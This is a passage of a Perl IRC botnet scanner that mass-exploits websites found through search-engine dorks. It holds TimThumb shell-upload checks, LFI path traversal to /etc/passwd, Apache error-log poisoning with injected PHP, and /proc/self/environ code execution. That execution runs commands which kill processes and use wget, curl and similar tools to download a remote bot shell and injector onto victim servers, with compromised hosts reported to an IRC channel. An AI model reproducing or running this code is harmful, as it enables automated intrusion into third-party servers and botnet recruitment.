  1138.                                 elsif(get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/thumb/"; &get_content("http://".$site.$bug."lib/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1139.                                 elsif(get_content("http://".$site.$bug."lib/script/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/script/thumb/"; &get_content("http://".$site.$bug."lib/script/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1140.                                 elsif(get_content("http://".$site.$bug."lib/custom/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/custom/"; &get_content("http://".$site.$bug."lib/custom/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1141.                                 elsif(get_content("http://".$site.$bug."layouts/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "layouts/"; &get_content("http://".$site.$bug."layouts/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1142.                                 elsif(get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/thumb/"; &get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1143.                                 elsif(get_content("http://".$site.$bug."custom/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "custom/"; &get_content("http://".$site.$bug."custom/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1144.                                 elsif(get_content("http://".$site.$bug."framework/includes/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/includes/"; &get_content("http://".$site.$bug."framework/includes/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1145.                                 elsif(get_content("http://".$site.$bug."framework/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "framework/thumb/"; &get_content("http://".$site.$bug."framework/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1146.                                 elsif(get_content("http://".$site.$bug."functions/scripts/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/scripts/"; &get_content("http://".$site.$bug."functions/scripts/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1147.                                 elsif(get_content("http://".$site.$bug."functions/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/thumb/"; &get_content("http://".$site.$bug."functions/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1148.                                 elsif(get_content("http://".$site.$bug."images/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "images/"; &get_content("http://".$site.$bug."images/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1149.                                 elsif(get_content("http://".$site.$bug."inc/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "inc/"; &get_content("http://".$site.$bug."inc/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1150.                                 elsif(get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/thumb/"; &get_content("http://".$site.$bug."includes/thumb/thumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1151.                 }
  1152.         }
  1153.  }
  1154.  
  1155. sub timrf() {
  1156. my ($vuln,$dir,$blog,$chan,$site,$engine) = @_;
  1157.  
  1158. &tim_xpla0($vuln,$dir,$blog,$chan,$site,$engine); &tim_xplb0($vuln,$dir,$blog,$chan,$site,$engine); &tim_xplc0($vuln,$dir,$blog,$chan,$site,$engine); &tim_xpld0($vuln,$dir,$blog,$chan,$site,$engine);
  1159. &tim_xpla2($vuln,$blog,$chan,$site,$engine); &tim_xplb2($vuln,$blog,$chan,$site,$engine); &tim_xplc2($vuln,$blog,$chan,$site,$engine); &tim_xpld2($vuln,$blog,$chan,$site,$engine);
  1160. }
  1161.  
  1162. sub tim_xpla0() {
  1163.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1164.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."cache/external_".md5_hex($shell).".php";
  1165.         my $dur = $url.$dir."cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1166.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); }
  1167.                 else {
  1168.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."cache/external_".md5_hex($shell).".php";
  1169.                 my $dur = $url."cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1170.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); }
  1171.         }
  1172. }
  1173.                
  1174. sub tim_xplb0() {
  1175.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1176.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."cache/".md5_hex($shell).".php";
  1177.         my $dur = $url.$dir."cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1178.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1179.                 else {
  1180.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."cache/".md5_hex($shell).".php";
  1181.                 my $dur = $url."cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1182.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1183.         }
  1184. }
  1185.                
  1186. sub tim_xplc0() {
  1187.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1188.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."temp/external_".md5_hex($shell).".php";
  1189.         my $dur = $url.$dir."temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1190.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1191.                 else {
  1192.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."temp/external_".md5_hex($shell).".php";
  1193.                 my $dur = $url."temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1194.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1195.         }
  1196. }
  1197.  
  1198. sub tim_xpld0() {
  1199.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1200.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."temp/".md5_hex($shell).".php";
  1201.         my $dur = $url.$dir."temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1202.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1203.                 else {
  1204.                 my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."temp/".md5_hex($shell).".php";
  1205.                 my $dur = $url."temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1206.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); }
  1207.         }
  1208. }
  1209. # /uploads/thumb-temp/
  1210. sub tim_xpla2() {
  1211.         my($url,$mode,$chan,$site,$engine) = @_;
  1212.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-temp/external_".md5_hex($shell).".php";
  1213.         my $dur = $url."wp-content/uploads/thumb-temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1214.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1215.                
  1216. sub tim_xplb2() {
  1217.         my($url,$mode,$chan,$site,$engine) = @_;
  1218.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-temp/".md5_hex($shell).".php";
  1219.         my $dur = $url."wp-content/uploads/thumb-temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1220.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); } }
  1221.  
  1222. sub tim_xplc2() {
  1223.         my($url,$mode,$chan,$site,$engine) = @_;
  1224.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-cache/external_".md5_hex($shell).".php";
  1225.         my $dur = $url."wp-content/uploads/thumb-cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1226.                 if ($check =~ /0wn3d/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1227.                
  1228. sub tim_xpld2() {
  1229.         my($url,$mode,$chan,$site,$engine) = @_;
  1230.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-cache/".md5_hex($shell).".php";
  1231.         my $dur = $url."wp-content/uploads/thumb-cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1232.                 if ($check =~ /0wn3d/ ) {       &info_main($dor,$chan,$engine,$timlogo); } }
  1233.  
  1234. ######################## LFD
  1235. sub lfd() {
  1236.         my ($chan,$bug,$dork,$engine) = @_;
  1237.     my $count = 0;
  1238.     my @list = &search_engine($chan,$bug,$dork,$engine,$lfdlogo);
  1239.     my $num = scalar(@list);
  1240.     if ($num > 0) {
  1241.         foreach my $site (@list) {
  1242.             $count++;
  1243.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$lfdlogo(7@2$engine15)10 Scan finish for14 $dork"); } }
  1244.             my $test = "http://".$site.$bug.$lfdtest;
  1245.             my $vuln = "http://".$site."12".$bug."6".$lfdtest;
  1246.             my $html = &get_content($test);
  1247.             if ($html =~ /$lfdoutput/) {
  1248.                 &msg("$chan","$lfdlogo(7@2$engine15)15(13@12Vuln15)4 ".$vuln." $nob0dy");
  1249.                 sleep(3);
  1250.             }
  1251.         }
  1252.     }
  1253. }
  1254. ######################## LFI
  1255. sub lfi() {
  1256.         my ($chan,$bug,$dork,$engine) = @_;
  1257.     my $count = 0;
  1258.     my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  1259.     my $num = scalar(@list);
  1260.     if ($num > 0) {
  1261.         foreach my $site (@list) {
  1262.             $count++;
  1263.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$lfilogo 12(4@0$engine12) 8==14F8=15I8=0N8=0I8=15S8=14H8== "); } }
  1264.                        
  1265.                         &lfi_nor($site,$chan,$bug,$engine);
  1266.  
  1267.                 }
  1268.         }
  1269. }
  1270.  
  1271. sub lfi_nor() {
  1272. my ($site,$chan,$bug,$engine) = @_;
  1273. my $site = $_[0];
  1274. $tot = 25;
  1275.         for ($num=0;$num<$tot;$num++) {
  1276.         if ($num == 0) {
  1277.         $dir='';
  1278.         $dirx='';
  1279.         }
  1280.                
  1281.         $dir.='../';
  1282.         $dirx.='....//';
  1283.  
  1284.         if(get_content("http://".$site.$bug.$dir."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &lfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1285.         elsif(get_content("http://".$site.$bug.$dir."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &lfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1286.         elsif(get_content("http://".$site.$bug.$dirx."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &lfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1287.         elsif(get_content("http://".$site.$bug.$dirx."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &lfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1288.         elsif(post_content("http://".$site.$bug.$dir."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &plfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1289.         elsif(post_content("http://".$site.$bug.$dir."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &plfi_vuln($site,$bug,$dir,$path,$chan,$engine); }
  1290.         elsif(post_content("http://".$site.$bug.$dirx."etc/passwd%0000") =~ /root:x:/) { $num=$tot; $path = "etc/passwd%0000"; &plfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1291.         elsif(post_content("http://".$site.$bug.$dirx."etc/group%0000") =~ /root:x:/) { $num=$tot; $path = "etc/group%0000"; &plfi_vuln($site,$bug,$dirx,$path,$chan,$engine); }
  1292.         else {}
  1293.         }
  1294. }
  1295.  
  1296. sub lfi_vuln() {
  1297. my ($site,$bug,$dir,$path,$chan,$engine) = @_;
  1298. my $mode = "get";
  1299.         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@7G-VulN12)12 http://".$site.$bug.$dir.$path." ");
  1300.         &lfi_logs($site,$bug,$dir,$mode,$chan,$engine);
  1301.         &lfi_env($site,$bug,$dir,$mode,$chan,$engine);
  1302. }
  1303. sub plfi_vuln() {
  1304. my ($site,$bug,$dir,$path,$chan,$engine) = @_;
  1305. my $mode = "post";
  1306.         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@7P-VulN12)12 http://".$site.$bug.$dir.$path." ");
  1307.         &lfi_logs($site,$bug,$dir,$mode,$chan,$engine);
  1308.         &lfi_env($site,$bug,$dir,$mode,$chan,$engine);
  1309. }
  1310.  
  1311. sub lfi_logs() {
  1312. my ($site,$bug,$dir,$mode,$chan,$engine) = @_;
  1313.         $codigo = "/0wn4g3.3u";
  1314.         $scanner = "http://".$site.$codigo;
  1315.         if ($mode eq "get") {
  1316.                 my $req = &get_content($scanner);
  1317.                 if($req =~ /0wn4g3.3u/) {
  1318.                         if(get_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "etc/httpd/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1319.                         if(get_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1320.                         if(get_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1321.                         if(get_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1322.                         if(get_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1323.                         if(get_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/www/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1324.                         if(get_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1325.                         if(get_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache2/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1326.                         if(get_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1327.                         if(get_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/httpd/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1328.                         if(get_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /File does not exist/ && get_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "opt/lampp/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1329.                 }
  1330.         }
  1331.         elsif ($mode eq "post") {
  1332.                 my $req = &get_content($scanner);
  1333.                 if($req =~ /0wn4g3.3u/) {
  1334.                         if(post_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."etc/httpd/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "etc/httpd/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1335.                         if(post_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."usr/local/apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1336.                         if(post_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."usr/local/apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "usr/local/apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1337.                         if(post_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."apache/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1338.                         if(post_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."apache2/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "apache2/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1339.                         if(post_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/www/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/www/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1340.                         if(post_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/apache/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1341.                         if(post_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/apache2/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/apache2/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1342.                         if(post_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1343.                         if(post_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."var/log/httpd/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "var/log/httpd/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1344.                         if(post_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /File does not exist/ && post_content("http://".$site.$bug.$dir."opt/lampp/logs/error_log%0000") =~ /0wn4g3.3u/) { $pwd = "opt/lampp/logs/error_log%0000"; &lfi_log_vuln_xpl($site,$bug,$dir,$mode,$pwd,$chan,$engine); }
  1345.                 }
  1346.         }
  1347. }
  1348.  
  1349. sub lfi_log_vuln_xpl() {
  1350. my ($site,$bug,$dir,$mode,$pwd,$chan,$engine) = @_;
  1351.  
  1352.         $dwa = "/<? echo '0key'; if(@fwrite(fopen('/tmp/h4rd','w'),@file_get_contents('".$botshell."'))) { echo '0wn4ge';@fwrite(fopen('/tmp/pb','w'),file_get_contents('".$injector."')); } ";
  1353.         $dwa .= "elseif(@copy('".$botshell."','/tmp/h4rd')) { echo '0wn4ge';@copy('".$injector."','/tmp/pb'); } else {  echo '0wn4ge'; } ".$b0tcmd." ?>";
  1354.  
  1355.         my $injectcode = "http://".$site.$dwa;
  1356.         if ($mode eq "get") {
  1357.                 &get_content($injectcode);
  1358.                 my $excmd = "http://".$site.$bug.$dir.$pwd;  
  1359.                 my $req = &get_content($excmd);
  1360.                 if($req =~ /0key/ && $req =~ /0wn4ge/) {
  1361.                         my $check = &get_content("http://".$site.$bug.$dir."tmp/h4rd%0000"); sleep(2);
  1362.                         if ($check =~ /0wn3d/) { $dor = "http://".$site.$bug.$dir."tmp/h4rd%0000"; &info_main($dor,$chan,$engine,$lfilogo); &get_content("http://".$site.$bug.$dir."tmp/pb%0000"); sleep(2); }
  1363.                         else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@10G-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)"); }
  1364.                 } elsif($req =~ /0key/) {
  1365.                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@10G-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)");
  1366.                 } else {
  1367.                         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@10G-LOGS12)10 http://".$site.$bug.$dir.$pwd."");
  1368.                 }
  1369.         }
  1370.         elsif ($mode eq "post") {
  1371.                 &post_content($injectcode);
  1372.                 my $excmd = "http://".$site.$bug.$dir.$pwd;  
  1373.                 my $req = &post_content($excmd);
  1374.                 if($req =~ /0key/ && $req =~ /0wn4ge/) {
  1375.                         my $check = &post_content("http://".$site.$bug.$dir."tmp/h4rd%0000"); sleep(2);
  1376.                         if ($check =~ /0wn3d/) { $dor = "http://".$site.$bug.$dir."tmp/h4rd%0000"; &info_main($dor,$chan,$engine,$lfilogo); &post_content("http://".$site.$bug.$dir."tmp/pb%0000"); sleep(2); }
  1377.                         else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@10P-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)"); }
  1378.                 } elsif($req =~ /0key/) {
  1379.                         &msg("$chan","$lfilogo 12(4@0$engine12)(4@10P-LOGS12)10 http://".$site.$bug.$dir.$pwd." 12(4@0OKEE12)");
  1380.                 } else {
  1381.                         &msg("$chan", "$lfilogo 12(4@0$engine12)(4@10P-LOGS12)10 http://".$site.$bug.$dir.$pwd."");
  1382.                 }
  1383.         }
  1384. }
  1385.  
  1386. sub lfi_env() {
  1387. my ($site,$bug,$dir,$mode,$chan,$engine) = @_;
  1388.         if ($mode eq "get") {
  1389.                 if(get_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /DOCUMENT_ROOT=\// && get_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /HTTP_USER_AGENT/) { $pwd = "proc/self/environ%0000"; &lfi_env_vuln_xpl($site,$bug,$dir,$pwd,$chan,$engine); }
  1390.         }
  1391.         elsif ($mode eq "post") {
  1392.                 if(post_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /DOCUMENT_ROOT=\// && post_content("http://".$site.$bug.$dir."proc/self/environ%0000") =~ /HTTP_USER_AGENT/) { $pwd = "proc/self/environ%0000"; &lfi_env_vuln_xpl($site,$bug,$dir,$pwd,$chan,$engine); }
  1393.         }
  1394. }
  1395.  
  1396. sub lfi_env_vuln_xpl() {
  1397. my ($site,$dir,$chan,$bug,$engine) = @_;
  1398.  
  1399. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  1400. my $vuln = "http://".$site."13".$bug.$dir."/proc/self/environ%0000";
  1401. my $shell = "http://".$site."13".$bug.$dir."/tmp/ripper%0000";
  1402.  
  1403. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1404.     my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$botshell.'","/tmp/ripper")) { echo "SUCCESS";@copy("'.$injector.'","/tmp/dev"); }';
  1405.     my $res = lfi_env_query($test,encode_base64($code));
  1406.         &lfi_spread_query($test);
  1407.         &get_content("http://".$site.$bug.$dir."/tmp/ripper%0000");
  1408.     $res =~ s/\n//g;
  1409.     if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
  1410.         my $sys = $1;
  1411.                 $nob0dy = $2;
  1412.         &msg("$chan","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 ".$shell." 12(4@8".$sys."12)  $nob0dy");sleep(2);
  1413.     }
  1414.     elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
  1415.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1416.             my $sys = $1;
  1417.                         $nob0dy = $2;
  1418.             my $upload = 'passthru("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*"); exec("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*"); system("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*"); shell_exec("killall -9 perl; killall -9 php; wget '.$injector.' -O pb.php; fetch -O pb.php '.$injector.'; cUrl -O pb.php '.$injector.'; lynx -dump '.$injector.' pb.php; GET '.$injector.'>pb.php;  lwp-download '.$injector.' pb.php; wget '.$botshell.' -O h4rd.php; fetch -O h4rd.php '.$botshell.'; cUrl -O h4rd.php '.$botshell.'; lynx -dump '.$botshell.' h4rd.php; GET '.$botshell.'>h4rd.php; lwp-download '.$botshell.' h4rd.php*");';
  1419.             my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
  1420.             my $check = &get_content("http://".$site.$bug.$dir."/tmp/ripper%0000"); sleep(2);
  1421.             if ($check =~ /0wn3d/) {
  1422.                                 &msg("$chan","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 $shell 12(4@8$sys12)  $nob0dy");sleep(2);
  1423.                                 &msg("$admin","$lfilogo 12(4@0$engine12)(4@8SHELL12)13 $shell 12(4@8$sys12)  $nob0dy");sleep(2);
  1424.             }  
  1425.             else {
  1426.                 &msg("$chan","$lfilogo 12(4@0$engine12)(4@7SYSTEM12)11 $vuln 12(4@7$sys12)  $nob0dy");sleep(2);
  1427.             }
  1428.             } exit; }
  1429.             }
